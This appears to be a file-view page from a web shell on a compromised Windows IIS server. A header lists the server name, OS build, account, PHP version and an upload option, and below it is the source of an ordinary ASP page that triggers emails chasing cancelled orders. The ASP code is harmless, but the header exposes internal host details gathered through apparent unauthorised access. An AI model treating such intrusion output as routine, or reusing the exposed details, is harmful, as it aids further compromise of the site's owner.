HEX
Server: Microsoft-IIS/10.0
System: Windows NT ITPWINWEBSVR22 10.0 build 20348 (Windows Server 2022) AMD64
User: www.conferencesearch.co.uk (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: D:/web/coventrydemolition/chase-cancelled-orders.asp
<%Option Explicit%>
<!--#include file="dbfunctions.asp"-->
<!--#include file="apputils.asp"-->
<!--#include file="inc-template-other.asp"-->
<!--#include file="inc-template-messages.asp"-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<%DisableCache ' 18/02/10 %>
<title>Chase Cancelled Orders <%=Now%></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="styles.css" rel="stylesheet" type="text/css">
</head>

<body>
<div>

<%
' (SS,14/2/13)
SendChaseCancelledOrderEmails
' (SS,18/02/10) added Now to show current date/time to help determine that it's not getting a cached page
%>
<br><br><table><tr><td><%=Now%></td></tr></table>
</div>

</body>
</html>
<%Finalise%>